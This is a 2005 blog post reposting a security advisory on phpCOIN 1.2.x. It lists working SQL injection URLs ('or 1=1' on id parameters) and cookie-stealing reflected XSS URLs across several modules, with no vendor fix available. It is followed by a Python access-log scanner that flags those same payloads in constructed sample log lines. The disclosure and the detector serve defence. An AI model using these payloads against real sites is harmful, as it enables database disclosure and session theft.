Saturday, March 05, 2005

Command injection and XSS with phpCOIN

phpCOIN is free software used for the websites of hosting resellers, ...
Well, I'll just copy it straight from my friend Lostmon; you'll see it more clearly:
############SQL injection:############
disclose some SQL data...
http://[target]phpcoin/mod.php?mod=siteinfo&id=1'
ummm then ...
http://[target]phpcoin/mod.php?mod=faq&mode=show&faq_id=2%20or%201=1
http://[target]phpcoin/mod.php?mod=pages&mode=view&id=25%20or%201=1
http://[target]phpcoin/mod.php?mod=siteinfo&id=4%20or%201=1
http://[target]phpcoin/mod.php?mod=articles&mode=list&dtopic_id=1%20or%201=1
http://[target]phpcoin/mod.php?mod=orders&mode=view&ord_id=1002%20or%201=1
http://[target]phpcoin/mod.php?mod=domains&mode=view&dom_id=2%20or%201=1
http://[target]phpcoin/mod.php?mod=invoices&mode=view&invc_id=1002%20or%201=1

#################cross site scripting#################

http://[target]phpcoin/mod.php?mod=helpdesk&mode=new%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]phpcoin/mod.php?mod=mail&mode=reset&w=user%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]phpcoin/login.php?w=user&o=login&e=u%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://[target]phpcoin/login.php?w=admin&o=login%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E

Other scripts are susceptible to injection of HTML or JavaScript code...
##################versions affected
##################1.2.0 1.2.1b 1.2.1
##########Solution:
##########No solution was available at this time; look for vendor information or for new release versions.
Credits:
Sincerely: Lostmon (lostmon@gmail.com)
Thnx to estrella for being my light
Thnx to all who believed in me
Web-Blog: http://lostmon.blogspot.com
Curiosity is what moves the mind....
-------------------------------------------------------------------

Personal opinion:

Many thanks, Lostmon, for letting us know about this valuable phpCOIN bug; I hope you keep publishing many more of this kind :D
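
Added example, not part of the original post or of Lostmon's advisory: since the advisory reports no vendor fix, this is a log check an operator could run to flag requests in which the parameters named above carry non-numeric ids or markup. The split of parameters into numeric and keyword groups, the allowed character sets, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names come from the advisory's URLs. Treating the first group as
# integers and the second as plain keywords is an assumption based on the
# values shown there (e.g. faq_id=2, mode=show).
NUMERIC_PARAMS = {"id", "faq_id", "dtopic_id", "ord_id", "dom_id", "invc_id"}
KEYWORD_PARAMS = {"mod", "mode", "w", "o", "e"}
NUMERIC_RE = re.compile(r"[0-9]+")
KEYWORD_RE = re.compile(r"[A-Za-z0-9_]+")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[0-9.]+"')

def audit_request(target):
    """Return (param, reason) findings for one request target."""
    findings = []
    # parse_qsl percent-decodes, so %20or%201=1 and %22%3E%3Cscript%3E are
    # checked in their decoded form.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not NUMERIC_RE.fullmatch(value):
            findings.append((name, "non-numeric id"))
        elif name in KEYWORD_PARAMS and not KEYWORD_RE.fullmatch(value):
            findings.append((name, "unexpected characters"))
    return findings

def scan_log(lines):
    """Return [(target, findings)] for access-log lines that look suspicious."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match:
            findings = audit_request(match.group(1))
            if findings:
                hits.append((match.group(1), findings))
    return hits

# Constructed access-log lines (common-log style, documentation IP addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Mar/2005:10:00:01 +0000] "GET /phpcoin/mod.php?mod=faq&mode=show&faq_id=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [05/Mar/2005:10:02:17 +0000] "GET /phpcoin/mod.php?mod=faq&mode=show&faq_id=2%20or%201=1 HTTP/1.1" 200 9344',
    '192.0.2.44 - - [05/Mar/2005:10:03:40 +0000] "GET /phpcoin/login.php?w=user&o=login&e=u%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for target, findings in scan_log(SAMPLE_LOG):
        print(target, findings)
```

The same allow-list (digits only for the id parameters, a fixed keyword set for the rest) can be enforced in front of the application as a request filter until a fixed release is available.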

Welcome!

Today I start this new blog; in this blog, I post my bugs.